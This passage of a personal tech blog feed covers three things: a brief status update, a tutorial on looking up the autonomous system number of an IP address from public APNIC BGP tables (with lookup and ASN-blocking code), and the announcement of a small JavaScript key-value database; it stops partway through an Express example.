incolumitas.comhttps://incolumitas.com/2023-10-01T18:05:00+02:00The State of this Blog2023-10-01T18:05:00+02:002023-10-01T18:05:00+02:00Nikolai Tschachertag:incolumitas.com,2023-10-01:/2023/10/01/the-state-of-this-blog/<p>An update regarding the state of this blog</p><figure>
<img src="https://incolumitas.com/images/me-on-chasseral.jpg" alt="just me" />
<figcaption>A rare moment I am not working...</figcaption>
</figure>
<p>I haven't posted in over a year. The reasons are as follows:</p>
<ol>
<li>My current job keeps me quite busy</li>
<li>For obvious reasons, I cannot publish blog posts about scraping, bot detection, proxy detection and related topics right now</li>
<li>I am currently just not creative enough to come up with new computer science side projects</li>
</ol>
<p>I think the main reason for the lack of new blog posts is simply my general lack of passion for exploring new paths in computer science.</p>
<p>Especially now, in the era of stunning AI advances, it seems to be only a matter of time until human creativity is no longer needed. I hope I am wrong.</p>
<p>I could maybe switch to discussing more societal or political topics, but I doubt I could ever rebrand this blog in that direction. Therefore, I won't do it.</p>
<p>However, this blog will prevail and at some point there will be fresh blog articles again. I started the blog in 2012 and it will likely stay around for another 10 years.</p>
<p>If you guys have some interesting things to explore, please leave a comment. I am looking for something exciting...</p>How to find the ASN for any IP Address?2022-07-31T20:34:00+02:002022-07-31T20:34:00+02:00Nikolai Tschachertag:incolumitas.com,2022-07-31:/2022/07/31/Find-the-ASN-for-any-IP-Address/<p>On the Internet, each IP address belongs to an autonomous system (AS). This blog article demonstrates how any IP address can be mapped to an AS number. The data sources needed to map each IP address to an autonomous system are provided as well, since they were not easy to find.</p><h2>ASN Lookup Demo</h2>
<div class="ipAPIDemo">
<label style="font-weight: 600; font-size: 15px" for="ip">Enter IP address to find its ASN</label>
<input style="padding: 6px;" type="text" id="ip" name="ip" value="13.34.52.117">
<input class="orange_button" type="submit" value="Lookup ASN">
<div>
<p><strong>Lookup Examples:</strong>
<a class="api-example" data-query="AS209103" href="#">AS209103</a> —
<a class="api-example" data-query="AS7359" href="#">AS7359</a> —
<a class="api-example" data-query="AS10846" href="#">AS10846</a>
</p>
</div>
<pre id="wrapper">
<code id="data" class="JSON hljs">{
"message": "Please make an API request"
}</code>
</pre>
</div>
<script>
var el = document.getElementById('data');
hljs.highlightBlock(el);
function makeApiRequest(query) {
let url = query ? 'https://api.incolumitas.com/datacenter?ip=' + query : 'https://api.incolumitas.com/datacenter';
fetch(url)
.then(response => response.json())
.then(function(data) {
var el = document.getElementById('data');
if (data) {
try {
delete data.is_datacenter;
delete data.datacenter;
} catch (err) {}
}
el.innerHTML = JSON.stringify(data, null, 2);
hljs.highlightBlock(el);
if (!query) {
document.getElementById('ip').value = data.ip;
}
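})
.catch(function(err) {
// Show the failure instead of silently keeping the old output
el.textContent = JSON.stringify({ error: String(err) }, null, 2);
});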
}
let linkNodes = document.querySelectorAll('a.api-example');
for (let node of linkNodes) {
node.addEventListener('click', function(evt) {
evt.preventDefault();
let query = evt.target.getAttribute('data-query');
document.getElementById('ip').value = query;
makeApiRequest(query);
});
}
makeApiRequest('');
document.querySelector('.ipAPIDemo input[type="submit"]').addEventListener('click', function(evt) {
var ip = document.getElementById('ip').value;
makeApiRequest(ip)
})
</script>
<p><a
class="orange_button"
href="https://incolumitas.com/pages/Datacenter-IP-API/">
ASN API Page
</a></p>
<h2>Introduction</h2>
<p>The Internet consists of many independent systems called <strong>Autonomous Systems (AS)</strong>. Each autonomous system is assigned a number, the <strong>ASN</strong>. An autonomous system belongs to a single administrative organisation that defines a coherent routing policy towards the rest of the Internet (and especially towards the neighboring autonomous systems). The <a href="https://en.wikipedia.org/wiki/Border_Gateway_Protocol">Border Gateway Protocol (BGP)</a> implements AS routing policies.</p>
<p>You can think of an autonomous system as a subset of the Internet that follows a common routing policy and is controlled by one administrative entity (such as a large ISP or a public organization such as a university). Each publicly routed IPv4 and IPv6 address normally belongs to exactly one autonomous system. Furthermore, each autonomous system can have multiple IPv4 and IPv6 address ranges assigned to it.</p>
<p>AS numbers are either 16-bit integers or 32-bit integers. For example, <code>AS34953</code> is an autonomous system number that belongs to the organization <code>RELAIX RelAix Networks GmbH</code> (which is actually the organisation responsible for providing Internet to the train from which I am writing this blog article):</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="nx">asn</span><span class="o">:</span> <span class="mf">34953</span><span class="p">,</span>
<span class="nx">cidr</span><span class="o">:</span> <span class="s1">'46.183.96.0/21'</span><span class="p">,</span>
<span class="nx">descr</span><span class="o">:</span> <span class="s1">'RELAIX RelAix Networks GmbH, DE'</span><span class="p">,</span>
<span class="nx">country</span><span class="o">:</span> <span class="s1">'DE'</span>
<span class="p">}</span>
</code></pre></div>
<p>This raises the question: which IP ranges are <em>owned</em> by this autonomous system (AS)? Of course, it is possible to obtain this information (I will soon reveal how). For now, let's see which IP ranges belong to the organization <code>RELAIX RelAix Networks GmbH</code>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"asn"</span><span class="o">:</span> <span class="mf">34953</span><span class="p">,</span>
<span class="s2">"descr"</span><span class="o">:</span> <span class="s2">"RELAIX RelAix Networks GmbH, DE"</span><span class="p">,</span>
<span class="s2">"country"</span><span class="o">:</span> <span class="s2">"de"</span><span class="p">,</span>
<span class="s2">"prefixes"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"5.145.128.0/20"</span><span class="p">,</span>
<span class="s2">"5.199.240.0/20"</span><span class="p">,</span>
<span class="s2">"45.146.172.0/22"</span><span class="p">,</span>
<span class="s2">"46.183.96.0/21"</span><span class="p">,</span>
<span class="s2">"88.218.160.0/22"</span><span class="p">,</span>
<span class="s2">"93.159.248.0/21"</span><span class="p">,</span>
<span class="s2">"129.192.10.0/24"</span><span class="p">,</span>
<span class="s2">"129.192.11.0/24"</span><span class="p">,</span>
<span class="s2">"161.51.255.0/24"</span><span class="p">,</span>
<span class="s2">"185.164.96.0/22"</span><span class="p">,</span>
<span class="s2">"185.217.62.0/24"</span><span class="p">,</span>
<span class="s2">"185.221.208.0/22"</span><span class="p">,</span>
<span class="s2">"185.243.232.0/23"</span><span class="p">,</span>
<span class="s2">"193.22.100.0/23"</span><span class="p">,</span>
<span class="s2">"193.28.5.0/24"</span><span class="p">,</span>
<span class="s2">"193.32.64.0/24"</span><span class="p">,</span>
<span class="s2">"195.242.220.0/24"</span>
<span class="p">],</span>
<span class="s2">"prefixesIPv6"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"2001:678:184::/48"</span><span class="p">,</span>
<span class="s2">"2001:67c:13b0::/48"</span><span class="p">,</span>
<span class="s2">"2001:67c:2054::/48"</span><span class="p">,</span>
<span class="s2">"2a00:fe0::/32"</span><span class="p">,</span>
<span class="s2">"2a0c:3000::/32"</span><span class="p">,</span>
<span class="s2">"2a0d:ae80::/32"</span><span class="p">,</span>
<span class="s2">"2a10:d900::/32"</span>
<span class="p">],</span>
<span class="s2">"active"</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="s2">"elapsed_ms"</span><span class="o">:</span> <span class="mf">0.06</span>
<span class="p">}</span>
</code></pre></div>
<p>As you can see, the autonomous system <code>AS34953</code> has IP ranges from totally different IPv4 <code>/8</code> address blocks. This might seem counterintuitive, but due to the scarcity of IPv4 addresses, it is not uncommon for a single AS to hold ranges from different <code>/8</code> IPv4 blocks.</p>
<figure>
<img src="https://incolumitas.com/images/ASN-Connections-In-RIPE-NCC.jpg" alt="ASN-Connections-In-RIPE-NCC" />
<figcaption>Visualizations of ASN Connections in RIPE NCC
<span style="font-size: 70%">(Source: <a href="https://thyme.apnic.net/BGP/RIPE/#">https://thyme.apnic.net/BGP/RIPE/#</a>)</span>
</figcaption>
</figure>
<p><strong>Why are autonomous systems relevant in IT security?</strong></p>
<p>In defensive IT Security, you often want to block offending IP addresses in order to stop spammers and ongoing attacks from hackers or botnets. Advanced or institutional attackers often own large blocks of IP addresses, therefore blocking single IP addresses is often not going to cut it. This problem becomes especially apparent with the gradual adoption of IPv6, where you can practically obtain huge ranges of IPv6 addresses without much effort.</p>
<p>By obtaining the ASN for each of the attacking IP addresses, it can potentially be learned that the attacker is launching her attack from only a few distinct autonomous systems. Then, as a first and drastic measure, one or several entire ASNs can be blocked in order to quickly choke an ongoing attack.</p>
<p>Furthermore, an autonomous system can often be mapped to a country, which gives geographical location information for an IP address and may further help to contextualize an ongoing attack.</p>
<p>In addition, knowing the AS organization of an IP address makes it possible to draw further conclusions: Is the organization a large and established ISP? Is it a company with a good reputation? Or is it an unknown business with a reputation for a lenient policy regarding spammers?</p>
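<p>To make the blocking idea more concrete, here is a minimal sketch that counts attacking IP addresses per ASN and returns the ASNs responsible for a large share of the attack. The input list, the function names <code>countByAsn</code> and <code>blockCandidates</code>, and the 50% threshold are assumptions made for illustration; <code>AS64500</code> and <code>198.51.100.23</code> come from the ranges reserved for documentation.</p>

```javascript
// Hypothetical input: attacking IPs that were already resolved to their ASN
// (for example via a lookup table built from BGP data).
const attackers = [
  { ip: '46.183.96.10', asn: 34953 },
  { ip: '5.145.128.7', asn: 34953 },
  { ip: '93.159.248.99', asn: 34953 },
  { ip: '198.51.100.23', asn: 64500 },
];

// Count how many attacking IPs originate from each ASN.
function countByAsn(entries) {
  const counts = new Map();
  for (const { asn } of entries) {
    counts.set(asn, (counts.get(asn) || 0) + 1);
  }
  return counts;
}

// Return the ASNs whose share of all attacking IPs is at least `minShare`.
function blockCandidates(entries, minShare = 0.5) {
  const counts = countByAsn(entries);
  return [...counts.entries()]
    .filter(([, n]) => n / entries.length >= minShare)
    .map(([asn]) => asn);
}

console.log(blockCandidates(attackers)); // [ 34953 ]
```

<p>Blocking a whole ASN also locks out its legitimate users, so in practice the threshold would probably be chosen conservatively.</p>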
<h2>How can IP addresses be mapped to Autonomous System Numbers (ASN)?</h2>
<p>The management and coordination of administrative tasks for the whole Internet is divided among five Regional Internet Registries (RIRs):</p>
<ol>
<li>ARIN</li>
<li>APNIC</li>
<li>RIPE NCC</li>
<li>AFRINIC</li>
<li>LACNIC</li>
</ol>
<p><a href="https://www.apnic.net/">APNIC</a> is the Regional Internet Registry responsible for the Asia-Pacific region. Luckily for us, APNIC makes BGP routing data publicly available. The data originates from Internet exchange points, for example from <a href="https://thyme.apnic.net/current/">DIX-IE (formerly NSPIXP2) in Tokyo, Japan</a> or from <a href="https://thyme.apnic.net/london/">Bhutan Telecom's router located at the LINX in London</a>.</p>
<p>The APNIC hosted page <a href="https://thyme.apnic.net/">https://thyme.apnic.net/</a> has an overview of all publicly available BGP routing table data that APNIC hosts, from which we can also download the required information to map AS numbers to IP addresses.</p>
<p>To map any IPv4 or IPv6 address to an ASN, we need the following three files:</p>
<ol>
<li><a href="https://thyme.apnic.net/current/data-raw-table">IPv4 prefixes and their origin ASNs</a> - This file contains the mapping of all IPv4 addresses to ASNs</li>
<li><a href="https://thyme.apnic.net/current/ipv6-raw-table">IPv6 prefixes and their origin ASNs</a> - This file contains the mapping of all IPv6 addresses to ASNs</li>
<li><a href="https://thyme.apnic.net/current/data-used-autnums">ASN to name mapping for ASNs visible on the Internet today</a> - This file maps each ASN to its human-readable name (a descriptive string that usually includes information about the responsible organization).</li>
</ol>
<p>After downloading those three files (downloading the data once a day is more than enough), you have all the information necessary to map any IP address to an ASN. You can write your own ASN lookup tool that finds the ASN for an IP address.</p>
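<p>A minimal sketch of such a lookup tool for IPv4 could look as follows. It assumes that each line of the IPv4 table has the form <code>prefix/length</code>, followed by whitespace and the origin ASN; please verify this against the downloaded file. The sample rows and all function names are made up for illustration, and <code>AS64500</code> is a documentation ASN. When several prefixes contain the address, the most specific one (longest prefix) wins.</p>

```javascript
// Assumed line format: "<prefix>/<length><whitespace><origin ASN>".
// The sample rows are illustrative only.
const sampleTable = [
  '46.183.96.0/21\t34953',
  '5.145.128.0/20\t34953',
  '46.183.0.0/16\t64500',
].join('\n');

// Convert a dotted IPv4 address into an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  return ip.split('.').reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

// Parse the table text into { network, length, asn } entries.
function parseTable(text) {
  return text.split('\n').filter(Boolean).map((line) => {
    const [cidr, asn] = line.trim().split(/\s+/);
    const [network, length] = cidr.split('/');
    return { network: ipv4ToInt(network), length: Number(length), asn: Number(asn) };
  });
}

// Check whether the integer address `ip` falls inside the given prefix.
function inPrefix(ip, { network, length }) {
  const size = 2 ** (32 - length); // number of addresses in the prefix
  return Math.floor(ip / size) === Math.floor(network / size);
}

// Longest-prefix match: the most specific matching prefix wins.
function lookupAsn(entries, ip) {
  const addr = ipv4ToInt(ip);
  let best = null;
  for (const entry of entries) {
    if (inPrefix(addr, entry) && (best === null || entry.length > best.length)) {
      best = entry;
    }
  }
  return best ? best.asn : null;
}

const entries = parseTable(sampleTable);
console.log(lookupAsn(entries, '46.183.100.1')); // 34953
console.log(lookupAsn(entries, '8.8.8.8'));      // null
```

<p>The linear scan keeps the sketch short. For the full routing table, a sorted array with binary search or a prefix trie would likely be a better fit.</p>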
<p>Of course, it's also possible to do the inverse and find all the IPv4 / IPv6 prefixes for a given ASN.</p>
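<p>The inverse lookup can be sketched by grouping the parsed rows by ASN. The row shape <code>{ cidr, asn }</code> and the function name <code>groupByAsn</code> are assumptions; the output keys <code>prefixes</code> and <code>prefixesIPv6</code> simply mirror the JSON shown earlier in this article.</p>

```javascript
// Assumed input: rows already parsed from the prefix tables as { cidr, asn }.
const rows = [
  { cidr: '46.183.96.0/21', asn: 34953 },
  { cidr: '5.145.128.0/20', asn: 34953 },
  { cidr: '2a00:fe0::/32', asn: 34953 },
  { cidr: '198.51.100.0/24', asn: 64500 },
];

// Build a Map from ASN to its prefixes, split by address family.
function groupByAsn(rows) {
  const byAsn = new Map();
  for (const { cidr, asn } of rows) {
    if (!byAsn.has(asn)) {
      byAsn.set(asn, { prefixes: [], prefixesIPv6: [] });
    }
    const bucket = byAsn.get(asn);
    // IPv6 prefixes contain a colon, IPv4 prefixes do not.
    (cidr.includes(':') ? bucket.prefixesIPv6 : bucket.prefixes).push(cidr);
  }
  return byAsn;
}

const byAsn = groupByAsn(rows);
console.log(byAsn.get(34953));
```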
<h2>Conclusion</h2>
<p>This article showed how ASN information can be obtained for any IP address and explained why AS data adds useful information in many different IT security use cases. Furthermore, a regularly updated website with the current mapping from IP addresses to ASNs was provided: <a href="https://thyme.apnic.net/current/">https://thyme.apnic.net/current/</a>.</p>
<p>A question to my readers: in case this website ceases to publish up-to-date ASN to IP mappings, where else could this information be obtained? Do other large Regional Internet Registries such as <a href="https://www.arin.net/">ARIN</a> or <a href="https://www.ripe.net/">RIPE NCC</a> provide equivalent information?</p>
<p><a href="https://incolumitas.com/pages/Datacenter-IP-API/">Link to the ASN API Page</a></p>db.js — In-Memory Key-Value Database with Persistent File Storage2022-05-29T12:36:00+02:002022-05-29T16:30:00+02:00Nikolai Tschachertag:incolumitas.com,2022-05-29:/2022/05/29/db.js-in-memory-key-value-database-with-persistent-file-storage/<p>Instead of using one of the many battle-tested and reliable database solutions out there, I created my own. In this quick blog post, I am announcing the release of <code>db.js</code> - an in-memory database with persistent file storage.</p><p><a class="btn" href="https://github.com/NikolaiT/db.js" style="padding: 10px; font-size: 16px;">Check out db.js on GitHub</a></p>
<h1>Design Principles</h1>
<p>From the many programming projects (often APIs) I have created in the past, I observed that I always need to persist data to disk in order to query/update it later. Quite frequently, I found myself (re)creating quick & dirty persistence logic. I usually store everything as JSON on disk. I don't like to use SQL databases if I don't have to.</p>
<p>Of course I could use something like <a href="https://memcached.org/">Memcached</a> or <a href="https://redis.io/">Redis</a>. Or even a SQL database service such as <a href="https://www.postgresql.org/">PostgreSQL</a>. To be honest, Memcached or Redis would have been a better solution.</p>
<p><img src="https://incolumitas.com/images/no_thanks.jpeg" alt="No thanks" style="border: 1px solid #767575;" /></p>
<p>Having discussed reinventing the wheel and that I like doing it, let's focus on the design principles and the capabilities that I need from <code>db.js</code>:</p>
<ol>
<li><strong>In-Memory</strong>: Recently stored data should be kept in an in-memory cache, since recent data is read and updated way more frequently than old data. This observation is <strong>paramount!</strong></li>
<li><strong>Key-Value semantics:</strong> I like to associate the stored object with a unique key. Therefore, I like to work with key-value stores.</li>
<li><strong>JSON Format</strong>: I like to store data as JSON in files, since the performance benefits of other data formats don't outweigh the ease of working with JSON. Put differently: I just don't have the time to learn any other data format than JSON. JSON is easily readable and that's what matters most. Everyone understands JSON. There are alternatives such as BSON, but no one really cares about them.</li>
<li><strong>Persistence:</strong> I don't want to care about when/why/where to persist data. This should be done by <code>db.js</code> in the background in a safe and consistent manner. Data is persisted to simple JSON files after the memory-cache reaches a certain age or size.</li>
<li><strong>No SQL required:</strong> No complex SQL query semantic is needed. In fact, the only way I need to query data is:<ul>
<li>based on a key with lookup time <code>O(1)</code></li>
<li>based on a time range <code>(ts0, ts1)</code> where <code>ts0</code> and <code>ts1</code> are both timestamps</li>
<li>based on an index range <code>(start, stop)</code> where <code>start</code> and <code>stop</code> are both integers</li>
<li>if I don't specify any selection criteria, then <code>db.js</code> should just return the memory cache contents (lookup time <code>O(1)</code>)</li>
</ul>
</li>
<li><strong>Data does not need to be deleted:</strong> I don't care about deleting data. Delete operations are hard to implement, since a delete operation requires an index and reverse index update. In fact, the benefit of a delete operation doesn't outweigh the complexity introduced by its implementation.</li>
</ol>
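<p>The query requirements listed above can be illustrated with a small in-memory sketch. This is not the actual <code>db.js</code> implementation: the class name <code>TinyStore</code>, its method names, and the inclusive time range are assumptions chosen for illustration. A <code>Map</code> provides the key lookup in <code>O(1)</code> on average, and an insertion-ordered array serves the time range and index range queries.</p>

```javascript
// Hypothetical in-memory store; NOT the actual db.js implementation.
class TinyStore {
  constructor() {
    this.index = new Map(); // key -> position in this.records
    this.records = [];      // insertion-ordered [{ key, value, ts }]
  }

  // Insert or update a value; `ts` defaults to the current time in ms.
  set(key, value, ts = Date.now()) {
    if (this.index.has(key)) {
      this.records[this.index.get(key)].value = value;
      return;
    }
    this.index.set(key, this.records.length);
    this.records.push({ key, value, ts });
  }

  // Key lookup via the Map index.
  get(key) {
    const pos = this.index.get(key);
    return pos === undefined ? undefined : this.records[pos].value;
  }

  // All records with ts0 <= ts <= ts1 (inclusive on both ends).
  getByTimeRange(ts0, ts1) {
    return this.records.filter((r) => r.ts >= ts0 && r.ts <= ts1);
  }

  // Records at positions start (inclusive) to stop (exclusive).
  getByIndexRange(start, stop) {
    return this.records.slice(start, stop);
  }
}

const store = new TinyStore();
store.set('a', 1, 1000);
store.set('b', 2, 2000);
store.set('c', 3, 3000);
console.log(store.get('b'));                                     // 2
console.log(store.getByTimeRange(1500, 3000).map((r) => r.key)); // [ 'b', 'c' ]
console.log(store.getByIndexRange(0, 2).map((r) => r.key));      // [ 'a', 'b' ]
```

<p>Because nothing is ever deleted, positions in the array never shift, which is what keeps the index this simple.</p>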
<h1>Quick Start & Usage</h1>
<p><code>db.js</code> allows you to work with key/value data without caring about data persistence and storage. All that <code>db.js</code> gives you is a key/value store. <code>db.js</code> persists data to disk as JSON files periodically and safely. Currently, <code>db.js</code> does not run as a daemon; it shuts down safely when the process is terminated.</p>
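<p>One common way to write JSON files safely is to write to a temporary file first and then rename it over the target. The sketch below shows that general technique with Node's built-in <code>fs</code> module. Whether <code>db.js</code> does it this way is an assumption; the helper names <code>persistJson</code> and <code>loadJson</code> and the file names are made up.</p>

```javascript
const fs = require('fs');
const os = require('os');
const path = require('path');

// Write `data` as JSON to `file` by writing a temp file first and renaming it.
// A rename within one directory is atomic on POSIX file systems, so a reader
// never sees a half-written file.
function persistJson(file, data) {
  const tmp = file + '.tmp';
  fs.writeFileSync(tmp, JSON.stringify(data));
  fs.renameSync(tmp, file);
}

// Load a previously persisted file, or return an empty object if none exists.
function loadJson(file) {
  return fs.existsSync(file) ? JSON.parse(fs.readFileSync(file, 'utf8')) : {};
}

// Demo in a throwaway directory. A real store would call persistJson from a
// timer and from its shutdown handler.
const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'kv-demo-'));
const file = path.join(dir, 'cache.json');
persistJson(file, { 4343: { name: 'test' } });
const restored = loadJson(file);
console.log(restored['4343'].name); // test
```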
<p>Installation:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/db.js
cd db.js/
</code></pre></div>
<p>Simple Usage:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">();</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'4343'</span><span class="p">,</span> <span class="p">{</span><span class="s1">'name'</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'4343'</span><span class="p">));</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
</code></pre></div>
<p>Of course <code>db.js</code> has many different configuration options that you can use:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// after what size in MB the memory cache should be persisted to disk</span>
<span class="nx">persist_after_MB</span><span class="o">:</span> <span class="mf">20</span><span class="p">,</span>
<span class="c1">// after what time in seconds the memory cache should be persisted to disk</span>
<span class="nx">persist_after_seconds</span><span class="o">:</span> <span class="mf">12</span> <span class="o">*</span> <span class="mf">60</span> <span class="o">*</span> <span class="mf">60</span><span class="p">,</span>
<span class="c1">// absolute/relative path to database directory</span>
<span class="nx">database_path</span><span class="o">:</span> <span class="s1">'/tmp/database/'</span><span class="p">,</span>
<span class="c1">// path to file where to log debug outputs to</span>
<span class="nx">logfile_path</span><span class="o">:</span> <span class="s1">'/tmp/dbjs.log'</span><span class="p">,</span>
<span class="c1">// after how many seconds should the cache and index be persisted</span>
<span class="nx">flush_interval</span><span class="o">:</span> <span class="mf">5</span> <span class="o">*</span> <span class="mf">60</span><span class="p">,</span>
<span class="c1">// file prefix for archived files</span>
<span class="nx">file_prefix</span><span class="o">:</span> <span class="s1">'dbjs_'</span><span class="p">,</span>
<span class="c1">// whether to print debug output</span>
<span class="nx">debug</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="c1">// max key size in bytes</span>
<span class="nx">max_key_size_bytes</span><span class="o">:</span> <span class="mf">1024</span><span class="p">,</span>
<span class="c1">// max value size in bytes</span>
<span class="nx">max_value_size_bytes</span><span class="o">:</span> <span class="mf">1048576</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">(</span><span class="nx">config</span><span class="p">);</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'someKey'</span><span class="p">,</span> <span class="s1">'someValue'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'someKey'</span><span class="p">));</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
</code></pre></div>
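<p>To illustrate how the two persistence thresholds could interact, here is a hypothetical helper. The option names <code>persist_after_MB</code> and <code>persist_after_seconds</code> are taken from the config above, but the function <code>shouldPersist</code> and the way the cache size is measured are assumptions, not the actual <code>db.js</code> logic.</p>

```javascript
// Hypothetical helper: decide whether the memory cache should be persisted.
// The size is approximated by the byte length of the serialized cache.
function shouldPersist(cache, cacheCreatedAtMs, config, nowMs = Date.now()) {
  const sizeMB = Buffer.byteLength(JSON.stringify(cache), 'utf8') / (1024 * 1024);
  const ageSeconds = (nowMs - cacheCreatedAtMs) / 1000;
  return sizeMB >= config.persist_after_MB || ageSeconds >= config.persist_after_seconds;
}

const config = { persist_after_MB: 20, persist_after_seconds: 12 * 60 * 60 };
const cache = { someKey: 'someValue' };

// One minute old and tiny: nothing to do yet.
console.log(shouldPersist(cache, 0, config, 60 * 1000));           // false
// Thirteen hours old: the age threshold of twelve hours is exceeded.
console.log(shouldPersist(cache, 0, config, 13 * 60 * 60 * 1000)); // true
```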
<h2>More Realistic Example</h2>
<p>Obviously, using <code>db.js</code> like above does not make much sense. I use <code>db.js</code> mostly as data storage for the many web APIs I am creating. Therefore, the following example using Express is more useful:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">)</span>
<span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// absolute/relative path to database directory</span>
<span class="nx">database_path</span><span class="o">:</span> <span class="s1">'/tmp/exampleDatabase/'</span><span class="p">,</span>
<span class="c1">// path to file where to log debug outputs to</span>
<span class="nx">logfile_path</span><span class="o">:</span> <span class="s1">'/tmp/example.log'</span><span class="p">,</span>
<span class="c1">// whether to print debug output</span>
<span class="nx">debug</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">(</span><span class="nx">config</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">()</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3000</span>
<span class="kd">function</span> <span class="nx">randomString</span><span class="p">(</span><span class="nx">length</span> <span class="o">=</span> <span class="mf">100</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">str</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">str</span> <span class="o">+=</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="mf">65</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">26</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Setting keys: http://localhost:3000/set?key=alpha&value=beta</span>
<span class="c1">// Getting value for a key: http://localhost:3000/get?key=alpha</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="s1">'/set'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a key'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">value</span> <span class="o">=</span> <span class="kc">undefined</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">value</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">value</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">value</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">value</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
